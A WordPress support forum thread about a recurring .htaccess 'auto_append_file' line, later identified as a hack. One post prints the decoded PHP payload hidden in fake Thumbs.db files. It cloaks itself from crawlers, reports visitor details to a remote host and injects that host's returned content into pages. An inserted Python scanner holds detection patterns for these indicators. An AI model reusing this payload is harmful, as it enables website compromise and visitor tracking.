
[resolved] Where to start on this .htaccess issue (23 posts)

  1. stubbyd
    Member
    Posted 2 years ago #

    I'm getting the following appear in one of my .htaccess files (it can be one or all three) on a semi-regular basis.

    php_value auto_append_file /home/USERDIR/public_html/Thumbs.db

    When it appears it causes the server to respond with a 500 error. My fix is to remove the line, save and refresh my page view.

    I'm guessing it comes from a plugin or possibly from the theme but don't even know where to begin to track it down. Any suggestions for tracking it down other than disabling / re-enabling plugins one by one? Because it only happens semi-frequently, that process would take me most of a year or longer to complete, and we need access to the websites to be available in the meantime.

  2. esmi
    Theme Diva & Forum Moderator
    Posted 2 years ago #

    I suggest that you try asking your hosts about it.

  3. stubbyd
    Member
    Posted 2 years ago #

    Thanks for the reply.

    I've already been down that route and they advise that something from the blog site is auto changing / updating the htaccess - thus my appearance here :)

  4. esmi
    Theme Diva & Forum Moderator
    Posted 2 years ago #

    It's not WordPress, so my guess is that it would be some sort of image handling plugin.

  5. stubbyd
    Member
    Posted 2 years ago #

    And I'm still clueless :)

    From what I can understand, the aspects that handle images are the media uploader part of WP and the following plugins:

    Featured Content Gallery - been there since day 1. This problem is maybe 1mth old.
    Sermon Browser (maybe) - can happily disable this one as it's only a test thing anyway.

    and that's about it - thus my confusion as this is definitely coming from somewhere but where is the issue.

  6. esmi
    Theme Diva & Forum Moderator
    Posted 2 years ago #

    WordPress doesn't do anything with Thumbs.db. That's a Windows specific file.

  7. stubbyd
    Member
    Posted 2 years ago #

    But my point is that something in the PHP code - be it a plugin or be it WP - is generating this extra line.

    I never said Thumbs.db was a WP file or a whatever file - I merely copied & pasted the line exactly as is. With the line in, it causes an error 500. Without it the websites work just fine.

  8. esmi
    Theme Diva & Forum Moderator
    Posted 2 years ago #

    WordPress doesn't do anything with - or relating to - Thumbs.db files.

  9. kmessinger
    Volunteer Moderator
    Posted 2 years ago #

    More about thumbs.db files and where they come from.

    http://www.ofzenandcomputing.com/zanswers/98/

    Maybe changing the permissions on the htaccess file would be the answer.

  10. stubbyd
    Member
    Posted 2 years ago #

    OK - I have tried changing the htaccess permissions. Maybe not severe enough though. What is the toughest I can go without disrupting its operational effectiveness?

    As to what / where thumbs.db are / from - thanks but I know.

    What I don't know is why on a *nix based web server with a wordpress install I'm suddenly getting this in my htaccess file:

    php_value auto_append_file /home/USERDIR/public_html/Thumbs.db

    As hinted earlier I have 3 htaccess files and this line will randomly appear in any or all of them. They are in my home directory, in my USERDIR directory and in my blog directory.

    There are two website URLs running here - one is an ecommerce setup running OSCommerce and the other a blog running under WP. I guess the ecommerce could be generating that line as well but why in the blog directory?

  11. esmi
    Theme Diva & Forum Moderator
    Posted 2 years ago #

    What I don't know is why on a *nix based web server with a wordpress install I'm suddenly getting this in my htaccess file:

    Ditto. I've never seen this on a *nix server before. I'm not even sure what it's supposed to do or why someone would want to prepend a script with Thumbs.db.

  12. stubbyd
    Member
    Posted 2 years ago #

    Folks I appreciate the replies - but with all due respect I'm getting nowhere.

    I guess I'll disable certain addons one at a time and see what happens.

  13. esmi
    Theme Diva & Forum Moderator
    Posted 2 years ago #

    I'm sorry we can't help further but this is totally bizarre and, fwiw, I still think it's a server issue.

  14. stubbyd
    Member
    Posted 2 years ago #

    Oh ok thanks for the responses anyway.

  15. anitramwaju
    Member
    Posted 2 years ago #

    The problem is probably not related to WordPress. I had the same problem (this line added at the end of every .htaccess file causing a 500 error) yesterday on a server with no WordPress on it.

    At the same time, Thumbs.db files appeared in each directory where there was an .htaccess. These Thumbs.db files are not related to Windows in any way but contain PHP code. This code is hidden in base64 (actually it's a bit more complicated…) and when decoded looks like

    @error_reporting(0);
    // Cloaking: known search-engine crawlers, and visitors already marked with the "stats" cookie, are served the normal page
    $list = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");
    if((preg_match("/".implode("|", $list)."/i", $_SERVER["HTTP_USER_AGENT"])) or (isset($_COOKIE["stats"]))) {
    } else {
    	// Everyone else is marked for 3 hours and the visitor's IP, user agent and host are reported to the remote server
    	@setcookie("stats",md5("stats"),time()+10800);
    	$file = @file_get_contents("http://cacacacacacacacaca.ca/in.php?i=".$_SERVER["REMOTE_ADDR"]
    		."&b=".urlencode($_SERVER["HTTP_USER_AGENT"])
    		."&h=".urlencode($_SERVER["HTTP_HOST"]));
    	// Whatever the remote server returns after the "!go!" marker is appended to the page output
    	if (strstr($file,"!go!")) {
    		$file = explode("!go!", $file);
    		$file = $file[1];
    		echo $file;
    	}
    }

    This code would have been executed if my server accepted the "php_value auto_append_file" directive in .htaccess, which it doesn't, and so it threw the 500 error instead.

  16. stubbyd
    Member
    Posted 2 years ago #

    Interesting - I haven't bothered to look inside the file. Just deleted the line in the htaccess

  17. esmi
    Theme Diva & Forum Moderator
    Posted 2 years ago #

    Ok - this looks very like a hack.
    http://codex.wordpress.org/FAQ_My_site_was_hacked
    http://wordpress.org/support/topic/268083#post-1065779
    http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/
    http://ottopress.com/2009/hacked-wordpress-backdoors/

    Since the hack uses Thumbs.db, it might be especially important to read the last link as it describes hack backdoors disguised as image files.

  18. stubbyd
    Member
    Posted 2 years ago #

    The site was hacked with an automated hack if I recall correctly.

    I'll go through the above posts one by one but I believe we cleared out any "issues" back when. I've used and use the exploit scanner and whilst it throws up queries on some of the plugins it throws them up whether it's a clean install or even if that same plugin is used on one of my own personal blogs.

    So that indicates to me that the scanner is picking up on coding that "could" be used but in these cases isn't. IYSWIM :)

    Anyway, again thank you and I will go through the process .... again :(

  19. sameprob
    Member
    Posted 2 years ago #

    My WordPress site got hit by the same malware and I wanted to share details. The infected files were dated May 7, 2011, about the same time as stubbyd's report.

    My site was running either WordPress 3.1.1 or 3.1.2 at the time (I believe 3.1.2). User account creation is disabled. The site had these plugins installed at the time:

    • Akismet 2.5.3
    • Blackbird Pie 0.5.1 (installed but disabled)
    • FeedBurner FeedSmith 2.3.1
    • Google Analyticator 6.1.3
    • Google XML Sitemaps 3.2.4
    • Hello Dolly 1.6 (installed but disabled)

    There are no CGI scripts or other custom code located on the server - only WordPress. I did have all WordPress files set with ownership by the Apache user (bad practice, I admit).

    In addition to creating the Thumbs.db payload file and appending the PHP reference above to the end of .htaccess, the malware also modified most PHP files in the root WordPress folder (notably not wp-config.php or a couple others) to include an eval() call to its payload wherever it found a <?php open tag. PHP files in WordPress subfolders fortunately weren't modified. Themes and plugins were not infected.

    Even better news is that I can't find any evidence of infection in the WordPress database itself. Simply overwriting all the core WordPress files with stock versions seems to eradicate the malware. I also upgraded WordPress to the latest version (3.1.3) and hardened my file permissions so the Apache user can no longer modify files.

    I'm convinced this is an underpublicized exploit in WordPress or one of the above plugins. If anyone else who got bit can post their WP and plugin versions, it would help narrow it down. I also found a description of this malware on this site, posted in the past week:

    http://www.neubreed.com.au/blog/2011/06/how_clean_after_thumbsdb_wordpress_and_php_auto_append_file_exploit_hack

    I only discovered my site was infected when Google Webmaster tools alerted me, so fortunately major browsers and search engines should be aware of this one by now. Good luck to anyone else who gets bit.
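    Added detection example, not code from the thread or from WordPress: a Python scan for the three indicators described above by anitramwaju and sameprob (the appended auto_append_file directive in .htaccess, a Thumbs.db that carries PHP, and an eval() injected right after a <?php open tag in core files). The sample site tree it builds is constructed for the demonstration; the regexes and file names are assumptions based on the thread, not a complete signature of the malware.

```python
import os
import re
import tempfile

# Indicators taken from the thread: the .htaccess directive that appends the payload,
# a Thumbs.db holding PHP, and eval() sitting directly after a <?php open tag.
HTACCESS_RE = re.compile(r"^\s*php_value\s+auto_(append|prepend)_file\b", re.I | re.M)
EVAL_INJECT_RE = re.compile(r"<\?php\s*@?eval\s*\(", re.I)


def scan_tree(root):
    """Walk root and return a sorted list of (relative_path, finding) tuples."""
    findings = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            try:
                with open(path, "rb") as fh:
                    data = fh.read(65536).decode("latin-1")  # only the head is needed
            except OSError:
                continue
            if name == ".htaccess" and HTACCESS_RE.search(data):
                findings.append((rel, "auto_append/prepend_file directive"))
            if name.lower() == "thumbs.db" and "<?php" in data:
                findings.append((rel, "Thumbs.db contains PHP"))
            if name.lower().endswith(".php") and EVAL_INJECT_RE.search(data):
                findings.append((rel, "eval() injected at open tag"))
    return sorted(findings)


def build_sample_site():
    """Constructed sample tree mimicking the infection pattern described in the thread."""
    root = tempfile.mkdtemp(prefix="wp_scan_")
    files = {
        ".htaccess": "RewriteEngine On\nphp_value auto_append_file /home/USERDIR/public_html/Thumbs.db\n",
        "Thumbs.db": "<?php @error_reporting(0); /* constructed stand-in for the payload */ ?>",
        "index.php": "<?php eval(base64_decode('Y29uc3RydWN0ZWQ=')); ?>\n<?php require 'wp-blog-header.php';",
        "wp-config.php": "<?php define('DB_NAME', 'example');",   # untouched, as sameprob reports
        "wp-includes/.htaccess": "Options -Indexes\n",            # clean subfolder
    }
    for rel, content in files.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write(content)
    return root


if __name__ == "__main__":
    for rel, finding in scan_tree(build_sample_site()):
        print(f"{rel}: {finding}")
```

Run it against a real document root instead of the sample tree to list every .htaccess, Thumbs.db and core PHP file that carries one of these markers; files it flags should be restored from stock copies as sameprob describes.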

  20. pictureitsolved
    Member
    Posted 2 years ago #

    @stubbyd: have you solved this yet? If not, see the link posted above by @sameprob for how to clean up. It was very helpful for me.

  21. stubbyd
    Member
    Posted 2 years ago #

    As it happens I'd forgotten about this post and for whatever reason I didn't see the response from "sameprob".

    However I did read the stuff supplied via "esmi" and it would appear that I concluded on doing the same as "sameprob".

    Effectively I overwrote all core files (again) and for each plugin that the security scanner said was suspect (a number of them detailed by sameprob) I replaced with fresh versions - since having done that I haven't seen any further repeats of the problem.

  22. fredriley
    Member
    Posted 2 years ago #

    I've just been hit by this same hack, but on my site I only have a test installation of WP and that's protected by a .htaccess file that's not been hacked. The .htaccess that was hacked was in my site web root which is a mystery as the file and web root were set to owner write only. I'm chasing this up with my hosting provider so that they can look at the logs to see where the hackbot got in.

    Looking at my WP installation, the following 3 folders are all set to world write (777), which I'm sure should not be the case:

    wp-admin
    wp-content
    wp-includes

    What permissions should these directories have?

    Fred

  23. fredriley
    Member
    Posted 2 years ago #

    It's probably a sign of madness to reply to your own posts, but I thought I'd better report that the hack culprit was a 2008 installation of phpMyAdmin on my site, and not WP.

Topic Closed

This topic has been closed to new replies.
